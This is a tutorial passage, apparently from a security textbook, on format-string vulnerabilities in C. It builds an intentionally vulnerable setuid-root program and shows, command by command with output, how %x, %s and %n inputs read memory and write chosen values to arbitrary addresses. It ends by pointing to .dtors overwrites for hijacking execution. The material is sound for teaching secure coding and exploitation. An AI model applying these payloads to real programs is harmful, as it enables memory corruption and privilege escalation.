Format-string exploits are a relatively new class of exploit. Like buffer-overflow exploits, the ultimate goal of a format-string exploit is to overwrite data in order to control the execution flow of a privileged program. Format-string exploits also depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format-string vulnerabilities and eliminate them. But first some background on format strings is needed.
Format strings are used by format functions, like printf(). These are functions that take in a format string as the first argument, followed by a variable number of arguments that are dependant on the format string. The printf() command has been used extensively in the previous pieces of code. Here's one example from the last program:
printf("You picked: %d\n", user_pick);
Here the format string is "You picked: %d\n". The printf() function prints the format string, but it performs a special operation when a format parameter like %d is encountered. This parameter is used to print the next argument of the function as a decimal integer value. The following table lists some other similar format parameters:
Parameter |
Output Type |
---|---|
|
|
%d |
Decimal |
%u |
Unsigned decimal |
%x |
Hexadecimal |
All of the preceding format parameters get their data as values, not pointers to values. There are also some format parameters that expect pointers, such as the following:
Parameter |
Output Type |
---|---|
|
|
%s |
String |
%n |
Number of bytes written so far |
The %s format parameter expects to be given a memory address and prints the data at that memory address until a null byte is encountered. The %n format parameter is special, in that it actually writes data. It also expects to be given a memory address and writes the number of bytes that have been written so far into that memory address.
A format function, such as printf(), simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three additional arguments to the function (in addition to the format-string argument). Some example code should help clarify things.
#include <stdio.h> int main() { char string[7] = "sample"; int A = -72; unsigned int B = 31337; int count_one, count_two; // Example of printing with different format string printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A); printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B); printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B); printf("[string] %s Address %08x\n", string, string); // Example of unary address operator and a %x format string printf("count_one is located at: %08x\n", &count_one); printf("count_two is located at: %08x\n", &count_two); // Example of a %n format string printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two); printf("count_one: %d\n", count_one); printf("count_two: %d\n", count_two); // Stack Example printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B, &B); exit(0); }
The following is the output of the program's compilation and execution.
$ gcc -o fmt_example fmt_example.c $ ./fmt_example [A] Dec: -72, Hex: ffffffb8, Unsigned: 4294967224 [B] Dec: 31337, Hex: 7a69, Unsigned: 31337 [field width on B] 3: '31337', 10: ' 31337', '00031337' [string] sample Address bffff960 count_one is located at: bffff964 count_two is located at: bffff960 The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two. count_one: 46 count_two: 113 A is -72 and is at bffff95c. B is 31337 and is at bffff958. $
The first two printf() statements demonstrate the printing of variables A and B, using different format parameters. Because there are three format parameters in each line, the variables A and B need to be supplied three times each. The %d format parameter allows for negative values, while %u does not, because it is expecting unsigned values.
A is outputted as a very high value when %u is used, because the negative value is stored using two's complement, but displayed as an unsigned value. Two's complement is the way negative numbers are stored on computers. The idea behind two's complement is to provide a binary representation of a number that when added to a positive number of the same magnitude will produce zero. This is done by first writing the positive number in binary, then flipping all the bits, and finally adding one. This can be quickly explored and validated with a hexadecimal and binary calculator, such as pcalc.
$ pcalc 72 72 0x48 0y1001000 $ pcalc 0y0000000001001000 72 0x48 0y1001000 $ pcalc 0y1111111110110111 65463 0xffb7 0y1111111110110111 $ pcalc 0y1111111110110111 + 1 65464 0xffb8 0y1111111110111000 $
This pcalc example shows that the last 2 bytes of the two's complement representation for –72 should be 0xffb8, which can be seen to be correct in the hexadecimal output of A.
The third line in the example, labeled [field width on B], shows the use of the field width option in a format parameter. This is just an integer number that designates the minimum field width for that format parameter. However, this is not a maximum field width: If the value to be outputted is greater than the field width, the field width will be exceeded. This happens when 3 is used, because the output data needs 5 bytes. When 10 is used as the field width, 5 bytes of blank space are outputted before the output data. Additionally, if a field width value begins with a zero, this means the field should be padded with zeros. When 08 is used, for example, the output is 00031337.
The fourth line, labeled [string], simply shows the use of the %s format parameter. The variable string is actually a pointer containing the address of the string, which works out wonderfully, because the %s format parameter expects its data to be passed by reference.
As these examples show, you should use %d for decimal, %u for unsigned, and %h for hexadecimal values. Minimum field widths can be set by putting a number right after the percent sign, and if the field width begins with 0, it will be padded with zeros. The %s parameter can be used to print strings and should be passed the address of the string. So far, so good.
The next part of the example demonstrates the use of the unary address operator. In C, any variable prepended with an ampersand will return the address of that variable. Here's that section of the fmt_example.c code:
// Example of unary address operator and a %x format string printf("count_one is located at: %08x\n", &count_one); printf("count_two is located at: %08x\n", &count_two);
The next piece of the fmt_example.c code demonstrates the use of the %n format parameter. The %n format parameter is different than all other format parameters, in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n format parameter, it writes out the number of bytes that have been written by the function to the address in the corresponding function argument. In fmt_example, this is done at two places, and the unary address operator is used to write this data into the variables count_one and count_two, respectively. The values are then outputted, revealing that 46 bytes are found before the first %n, and 113 before the second.
Finally, the stack example provides a convenient segue into an explanation of the stack's role with format strings:
printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B, &B);
When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order. First the address of B is pushed, then the value of B, then the address of A, then the value of A, and finally the address of the format string. The stack will look like this:
The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument in the stack corresponding to that parameter.
But what if only three arguments are pushed to the stack with a format string that uses four format parameters? Try changing the printf() line in the stack example to this:
printf("A is %d and is at %08x. B is %u and is at %08x.\n", A, &A, B);
This can be done in an editor or with a little bit of sed magic.
$ sed -e 's/B, &B)/B)/' fmt_example.c > fmt_example2.c $ gcc -o fmt_example fmt_example2.c $ ./fmt_example [A] Dec: -72, Hex: ffffffb8, Unsigned: 4294967224 [B] Dec: 31337, Hex: 7a69, Unsigned: 31337 [field width on B] 3: '31337', 10: ' 31337', '00031337' [string] sample Address bffff970 count_one is located at: bffff964 count_two is located at: bffff960 The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two. count_one: 46 count_two: 113 A is -72 and is at bffff96c. B is 31337 and is at 00000071. $
The result is 00000071. What the hell is 00000071? It turns out that because there wasn't a value pushed to the stack, the format function just pulled data from where the fourth argument should have been (by adding to the current frame pointer). This means 0x00000071 is the first value found below the stack frame for the format function.
This is definitely an interesting detail that should be remembered. It certainly would be a lot more useful if there were a way to control either the number of arguments passed to or expected by a format function. Luckily, there is a fairly common programming mistake that allows for the latter.
Sometimes programmers print strings using printf(string), instead of printf("%s", string). Functionally, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Both methods are shown in the following example.
#include <stdlib.h> int main(int argc, char *argv[]) { char text[1024]; static int test_val = -72; if(argc < 2) { printf("Usage: %s <text to print>\n", argv[0]); exit(0); } strcpy(text, argv[1]); printf("The right way:\n"); // The right way to print user-controlled input: printf("%s", text); // --------------------------------------------- printf("\nThe wrong way:\n"); // The wrong way to print user-controlled input: printf(text); // --------------------------------------------- printf("\n"); // Debug output printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val); exit(0); }
The following output shows the compilation and execution of fmt_vuln.
$ gcc -o fmt_vuln fmt_vuln.c $ sudo chown root.root fmt_vuln $ sudo chmod u+s fmt_vuln $ ./fmt_vuln testing The right way: testing The wrong way: testing [*] test_val @ 0x08049570 = -72 0xffffffb8 $
Both methods seem to work fine with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.
$ ./fmt_vuln testing%x The right way: testing%x The wrong way: testingbffff5a0 [*] test_val @ 0x08049570 = -72 0xffffffb8 $
When the %x format parameter was used, the hexadecimal representation of a 4-byte word in the stack was printed. This process can be used repeatedly to examine stack memory.
$ ./fmt_vuln 'perl -e 'print "%08x."x40;'' The right way: %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08 x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.% 08x.%08x.%08x.%08x.%08x.%08x.%08x. The wrong way: bffff4e0.000003e8.000003e8.78383025.3830252e.30252e78.252e7838.2e783830.78383025.38 30252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.7838 3025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e7838 30.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838 .2e783830.78383025.3830252e. [*] test_val @ 0x08049570 = -72 0xffffffb8 $
So this is what the lower stack memory looks like. Remember that each 4-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot. Wonder what those bytes are.
$ printf "\x25\x30\x38\x78\x2e\n" %08x. $
As you can see, it's the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s or %n.
The %s format parameter can be used to read from arbitrary memory addresses. Because it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s format parameter, as shown here:
$ ./fmt_vuln AAAA%08x.%08x.%08x.%08x The right way: AAAA%08x.%08x.%08x.%08x The wrong way: AAAAbffff590.000003e8.000003e8.41414141 [*] test_val @ 0x08049570 = -72 0xffffffb8 $
The four bytes of 0x41 indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s instead of %x, the format function will attempt to print the string located at 0x41414141. This will cause the program to crash in a segmentation fault, because this isn't a valid address. But if a valid memory address is used, this process could be used to read a string found at that memory address.
$ ./getenvaddr PATH PATH is located at 0xbffffd10 $ pcalc 0x10 + 4 20 0x14 0y10100 $ ./fmt_vuln 'printf "\x14\xfd\xff\xbf"'%08x.%08x.%08x%s The right way: yáÿ¿%08x.%08x.%08x%s The wrong way: yáÿ¿bffff480.00000065.00000000/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/ usr/games/bin:/opt/insight/bin:.:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin [*] test_val @ 0x08049570 = -72 0xffffffb8 $ $ ./fmt_vuln 'printf "\x14\xfd\xff\xbf"'%x.%x.%x%s The right way: yáÿ¿%x.%x.%x%s The wrong way: yáÿ¿bffff490.65.0/bin:/usr/bin:/usr/local/bin:/opt/bin:/usr/X11R6/bin:/usr/games/bin :/opt/insight/bin:.:/sbin:/usr/sbin:/usr/local/sbin:/home/matrix/bin [*] test_val @ 0x08049570 = -72 0xffffffb8
Here the getenvaddr program is used to get the address for the environment variable PATH. Because the program name fmt_vuln is two bytes less than getenvaddr, 4 is added to the address, and the bytes are reversed due to the byte ordering. The fourth format parameter of %s reads from the beginning of the format string, thinking it's the address that was passed as a function argument. Because this address is the address of the PATH environment variable, it is printed as if a pointer to the environment variable were passed to printf().
Now that the distance between the end of the stack frame and the beginning of the format-string memory is known, the field width arguments can be omitted in the %x format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.
If the %s format parameter can be used to read an arbitrary memory address, the same technique using %n should be able to write to an arbitrary memory address. Now things are getting interesting.
The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln program, just begging to be overwritten. The test variable is located at 0x08049570, so by using a similar technique as before, you should be able to write to the variable.
$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%x%n The right way: %x.%x.%x%n The wrong way: bffff5a0.3e8.3e8 [*] test_val @ 0x08049570 = 20 0x00000014 $ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%08x.%08x.%08x%n The right way: %08x.%08x.%08x%n The wrong way: bffff590.000003e8.000003e8 [*] test_val @ 0x08049570 = 30 0x0000001e $
As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in the test variable depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field width option.
$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%100x%n The right way: %x.%x.%100x%n The wrong way: bffff5a0.3e8. 3e8 [*] test_val @ 0x08049570 = 117 0x00000075 $ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%183x%n The right way: %x.%x.%183x%n The wrong way: bffff5a0.3e8. 3e8 [*] test_val @ 0x08049570 = 200 0x000000c8 $ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%238x%n The right way: %x.%x.%238x%n The wrong way: bffff5a0.3e8. 3e8 [*] test_val @ 0x08049570 = 255 0x000000ff $
By manipulating the field width option of one of the format parameters before the %n, a certain number of blank spaces can be inserted, resulting in the output having some blank lines, which, in turn, can be used to control the number of bytes written before the %n format parameter. This approach will work fine for small numbers, but it won't work for larger numbers, like memory addresses.
Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. Remember that the least significant byte is actually located in the first byte of the 4-byte word of memory. This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a 4-byte word, as shown here:
Memory |
XX XX XX XX |
Address |
---|---|---|
First write |
AA 00 00 00 |
0x08049570 |
Second write |
BB 00 00 00 |
0x08049571 |
Third write |
CC 00 00 00 |
0x08049572 |
Fourth write |
DD 00 00 00 |
0x08049573 |
Result |
AA BB CC DD |
As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049570, 0x08049571, 0x08049572, and 0x08049573 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.
The first write should be easy.
$ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%x%n The right way: %x.%x.%x%n The wrong way: bffff5a0.3e8.3e8 [*] test_val @ 0x08049570 = 20 0x00000014 $ pcalc 20 - 3 17 0x11 0y10001 $ pcalc 0xaa - 17 153 0x99 0y10011001 $ ./fmt_vuln 'printf "\x70\x95\x04\x08"'%x.%x.%153x%n The right way: %x.%x.%153x%n The wrong way: bffff5a0.3e8. 3e8 [*] test_val @ 0x08049570 = 170 0x000000aa $
The first byte should be 0xAA, and the last %x format parameter outputs 3 bytes of 3e8. Because 20 was written into the test variable, basic math can be used to deduce that the format parameters before that had written 17 bytes. In order to get the least significant byte to equal 0xAA, the last %x format parameter must be made to output 153 bytes instead of just 3. The field width parameter can make this adjustment quite nicely.
Now for the next write. Another argument is needed for another %x format parameter to increment the byte count up to 187, which is 0xBB in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049570. Because this is all still in the memory of the format string, it can be easily controlled. The word "JUNK" is four bytes long and will work fine.
After that, the next memory address to be written to, 0x08049771, should be put into memory so the second %n format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed out by the format function, thus incrementing the byte counter used for the %n format parameter. This is getting tricky.
Perhaps the beginning of the format string should be thought about ahead of time. The end goal is to have four writes. Each one will need to have a memory address passed to it, and between them all, four bytes of junk are needed to properly increment the byte counter for the %n format parameters. The first %x format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied data. So, for the entire write procedure, the beginning of the format string should look like this:
Let's give it a try.
$ ./fmt_vuln 'printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.% x.%x%n The right way: JUNKJUNKJUNK%x.%x.%x%n The wrong way: JUNKJUNKJUNKbffff580.3e8.3e8 [*] test_val @ 0x08049570 = 44 0x0000002c $ pcalc 44 - 3 41 0x29 0y101001 $ pcalc 0xaa - 41 129 0x81 0y10000001 $ ./fmt_vuln 'printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.% x.%129x%n The right way: JUNKJUNKJUNK%x.%x.%129x%n The wrong way: JUNKJUNKJUNKbffff580.3e8. 3e8 [*] test_val @ 0x08049570 = 170 0x000000aa $
The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 153, because six new 4-byte words have been added to the front of the format string.
Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.
$ pcalc 0xbb - 0xaa 17 0x11 0y10001 $ ./fmt_vuln 'printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.% x.%129x%n%17x%n The right way: JUNKJUNKJUNK%x.%x.%129x%n%17x%n The wrong way: JUNKJUNKJUNKbffff580.3e8. 3e8 4b4e554a [*] test_val @ 0x08049570 = 48042 0x0000bbaa $
The next desired value for the least significant byte is 0xBB. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n format parameter. Because memory has already been set up for a %x format parameter, it's simple to write 17 bytes using the field width option.
This process can be repeated for the third and fourth writes.
$ pcalc 0xcc - 0xbb 17 0x11 0y10001 $ ./fmt_vuln 'printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.% x.%129x%n%17x%n%17x%n The right way: JUNKJUNKJUNK%x.%x.%129x%n%17x%n%17x%n The wrong way: JUNKJUNKJUNKbffff570.3e8. 3e8 4b4e554a 4b4e554a [*] test_val @ 0x08049570 = 13417386 0x00ccbbaa $ pcalc 0xdd - 0xcc 17 0x11 0y10001 $ ./fmt_vuln 'printf "\x70\x95\x04\x08JUNK\x71\x95\x04\x08JUNK\x72\x95\x04\x08JUNK\x73\x95\x04\x08"'%x.% x.%129x%n%17x%n%17x%n%17x%n The right way: JUNKJUNKJUNK%x.%x.%129x%n%17x%n%17x%n%17x%n The wrong way: JUNKJUNKJUNKbffff570.3e8. 3e8 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0x08049570 = -573785174 0xddccbbaa $
By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also get overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val, right after test_val, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed magic.
Here, next_val is initialized with the value 0x11111111, so the effect of the write operations on it will be apparent.
$ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/g;x;G}' fmt_vuln.c > fmt_vuln2.c $ diff fmt_vuln.c fmt_vuln2.c 6c6 ` static int test_val = -72; --- > static int test_val = -72, next_val = 0x11111111; 27a28 > printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val); $ gcc -o fmt_vuln2 fmt_vuln2.c $ ./fmt_vuln2 test The right way: test The wrong way: test [*] test_val @ 0x080495d0 = -72 0xffffffb8 [*] next_val @ 0x080495d4 = 286331153 0x11111111
As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is shown to be adjacent to it. It should be good practice to write an address into the variable test_val again, using the new address.
Last time, a very convenient address of 0xddccbbaa was used. Because each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, 205 bytes must first be outputted in order to write the first byte of 0xCD using the %n format parameter. But then the next byte to be written is 0xAB, which would need to have 171 bytes outputted. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it. So, instead of trying to subtract 34 from 205, the least significant byte is just wrapped around to 0x1AB by adding 222 to 205 to produce 427, which is the decimal representation of 0x1AB. This technique can be used to wrap around again to set the least significant byte to 0x06 for the third write.
$ ./fmt_vuln2 AAAA%x.%x.%x.%x The right way: AAAA%x.%x.%x.%x The wrong way: AAAAbffff5a0.3e8.3e8.41414141 [*] test_val @ 0x080495d0 = -72 0xffffffb8 [*] next_val @ 0x080495d4 = 286331153 0x11111111 $ ./fmt_vuln2 'printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.% x.%x.%n The right way: JUNKJUNKJUNK%x.%x.%x.%n The wrong way: JUNKJUNKJUNKbffff580.3e8.3e8. [*] test_val @ 0x080495d0 = 45 0x0000002d [*] next_val @ 0x080495d4 = 286331153 0x11111111 $ pcalc 45 - 3 42 0x2a 0y101010 $ pcalc 0xcd - 42 163 0xa3 0y10100011 $ ./fmt_vuln2 'printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.% x.%163x.%n The right way: JUNKJUNKJUNK%x.%x.%163x.%n The wrong way: JUNKJUNKJUNKbffff580.3e8. 3e8. [*] test_val @ 0x080495d0 = 205 0x000000cd [*] next_val @ 0x080495d4 = 286331153 0x11111111 $ $ pcalc 0xab - 0xcd -34 0xffffffde 0y11111111111111111111111111011110 $ pcalc 0x1ab - 0xcd 222 0xde 0y11011110 $ ./fmt_vuln2 'printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.% x.%163x.%n%222x%n The right way: JUNKJUNKJUNK%x.%x.%163x.%n%222x%n The wrong way: JUNKJUNKJUNKbffff580.3e8. 3e8. 4b4e554a [*] test_val @ 0x080495d0 = 109517 0x0001abcd [*] next_val @ 0x080495d4 = 286331136 0x11111100 $ $ pcalc 0x06 - 0xab -165 0xffffff5b 0y11111111111111111111111101011011 $ pcalc 0x106 - 0xab 91 0x5b 0y1011011 $ ./fmt_vuln2 'printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.% x.%163x.%n%222x%n%91x%n The right way: JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n The wrong way: JUNKJUNKJUNKbffff570.3e8. 3e8. 4b4e554a 4b4e554a [*] test_val @ 0x080495d0 = 33991629 0x0206abcd [*] next_val @ 0x080495d4 = 286326784 0x11110000 $
With each write, bytes of the next_val variable, adjacent to test_val, are being overwritten. The wraparound technique seems to be working fine, but a slight problem manifests itself as the final byte is attempted.
$ pcalc 0x08 - 0x06 2 0x2 0y10 $ ./fmt_vuln2 'printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.% x.%163x.%n%222x%n%91x%n%2x%n The right way: JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n%2x%n The wrong way: JUNKJUNKJUNKbffff570.3e0. 3e8. 4b4e554a 4b4e554a4b4e554a [*] test_val @ 0x080495d0 = 235318221 0x0e06abcd [*] next_val @ 0x080495d4 = 285212674 0x11000002 $
What happened here? The difference between 0x06 and 0x08 is only 2, but 8 bytes are outputted, resulting in the byte 0x0e being written by the %n format parameter instead. This is because the field width option for the %x format parameter is only a minimum field width, and 8 bytes of data were to be outputted. This problem can be alleviated by simply wrapping around again; however, it's good to know the limitations of the field width option.
$ pcalc 0x108 - 0x06 258 0x102 0y100000010 $ ./fmt_vuln2 'printf "\xd0\x95\x04\x08JUNK\xd1\x95\x04\x08JUNK\xd2\x95\x04\x08JUNK\xd3\x95\x04\x08"'%x.% x.%163x.%n%222x%n%91x%n%258x%n The right way: JUNKJUNKJUNK%x.%x.%163x.%n%222x%n%91x%n%258x%n The wrong way: JUNKJUNKJUNKbffff570.3e8. 3e8. 4b4e554a 4b4e554a 4b4e554a [*] test_val @ 0x080495d0 = 134654925 0x0806abcd [*] next_val @ 0x080495d4 = 285212675 0x11000003 $
Just like before, the appropriate addresses and junk data are put in the beginning of the format string, and the least significant byte is controlled for four write operations to overwrite all 4 bytes of the variable test_val. Any value subtractions to the least significant byte can be accomplished by wrapping the byte around. Also, any additions less than 8 may need to be wrapped around in a similar fashion.
Direct parameter access is a way to simplify format-string exploits. In the previous exploits, each of the format parameter arguments had to be stepped through sequentially. This necessitated using several %x format parameters to step through parameter arguments until the beginning of the format string was reached. In addition, the sequential nature required three 4-byte words of junk to properly write a full address to an arbitrary memory location.
As the name would imply, direct parameter access allows parameters to be accessed directly by using the dollar sign qualifier. For example, %N$d would access the Nth parameter and display it as a decimal number.
printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
The preceding printf() call would have the following output:
7th: 70, 4th: 00040
First, the 70 is outputted as a decimal number when the format parameter of %7$d is encountered, because the seventh parameter is 70. The second format parameter accesses the fourth parameter and uses a field width option of 05. All of the other parameter arguments are untouched. This method of direct access eliminates the need to step through memory until the beginning of the format string is located, since this memory can be accessed directly. The following output shows the use of direct parameter access.
$ ./fmt_vuln AAAA%x.%x.%x.%x The right way: AAAA%x.%x.%x.%x The wrong way: AAAAbffff5a0.3e8.3e8.41414141 [*] test_val @ 0x08049570 = -72 0xffffffb8 $ ./fmt_vuln AAAA%4\$x The right way: AAAA%4$x The wrong way: AAAA41414141 [*] test_val @ 0x08049570 = -72 0xffffffb8 $
In this example, the beginning of the format string is located at the fourth parameter argument. Instead of stepping through the first three parameter arguments using %x format parameters, this memory can be accessed directly. Because this is being done on the command line and the dollar sign is a special character, it must be escaped with a backslash. This just tells the command shell to avoid trying to interpret the dollar sign as a special character. The actual format string can be seen when it is printed the right way.
Direct parameter access also simplifies the writing of memory addresses. Because memory can be accessed directly, there's no need for 4-byte spacers of junk data to increment the byte output count. Each of the %x format parameters that usually perform this function can just directly access a piece of memory found before the format string. For practice, let's try writing a more realistic looking address of 0xbffffd72 into the variable test_val using direct parameter access.
$ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$x%4\$n The right way: %3$x%4$n The wrong way: 3e8 [*] test_val @ 0x08049570 = 19 0x00000013 $ pcalc 0x72 - 16 98 0x62 0y1100010 $ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$98x%4\$n The right way: %3$98x%4$n The wrong way: 3e8 [*] test_val @ 0x08049570 = 114 0x00000072 $ $ pcalc 0xfd - 0x72 139 0x8b 0y10001011 $ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$98x%4\$n%3\$ 139x%5\$n The right way: %3$98x%4$n%3$139x%5$n The wrong way: 3e8 3e8 [*] test_val @ 0x08049570 = 64882 0x0000fd72 $ $ pcalc 0xff - 0xfd 2 0x2 0y10 $ pcalc 0x1ff - 0xfd 258 0x102 0y100000010 $ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$98x%4\$n%3\$ 139x%5\$n%3\$258x%6\$n The right way: %3$98x%4$n%3$139x%5$n%3$258x%6$n The wrong way: 3e8 3e8 3e8 [*] test_val @ 0x08049570 = 33553778 0x01fffd72 $ $ pcalc 0xbf - 0xff -64 0xffffffc0 0y11111111111111111111111111000000 $ pcalc 0x1bf - 0xff 192 0xc0 0y11000000 $ ./fmt_vuln 'printf "\x70\x95\x04\x08\x71\x95\x04\x08\x72\x95\x04\x08\x73\x95\x04\x08"'%3\$98x%4\$n%3\$ 139x%5\$n%3\$258x%6\$n%3\$192x%7\$n The right way: %3$98x%4$n%3$139x%5$n%3$258x%6$n%3$192x%7$n The wrong way: 3e8 3e8 3e8 3e8 [*] test_val @ 0x08049570 = -1073742478 0xbffffd72 $
Using direct parameter access simplifies the process of writing an address and shrinks the mandatory size of the format string.
The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.
In binary programs compiled with the GNU C compiler, special table sections called .dtors and .ctors are made for destructors and constructors, respectively. Constructor functions are executed before the main function is executed, and destructor functions are executed just before the main function exits with an exit system call. The destructor functions and the .dtors table section are of particular interest.
A function can be declared as a destructor function by defining the destructor attribute, as seen in the following code example.
#include <stdlib.h> static void cleanup(void) __attribute__ ((destructor)); main() { printf("Some actions happen in the main() function..\n"); printf("and then when main() exits, the destructor is called..\n"); exit(0); } void cleanup(void) { printf("In the cleanup function now..\n"); }
In the preceding code sample, the cleanup() function is defined with the destructor attribute, so the function is automatically called when the main function exits, as shown next.
$ gcc -o dtors_sample dtors_sample.c $ ./dtors_sample Some actions happen in the main() function.. and then when main() exits, the destructor is called.. In the cleanup function now.. $
This behavior of automatically executing a function on exit is controlled by the .dtors table section of the binary. This section is an array of 32-bit addresses terminated by a null address. The array always begins with 0xffffffff and ends with the null address of 0x00000000. Between these two are the addresses of all the functions that have been declared with the destructor attribute.
The nm command can be used to find the address of the cleanup function, and objdump can be used to examine the sections of the binary.
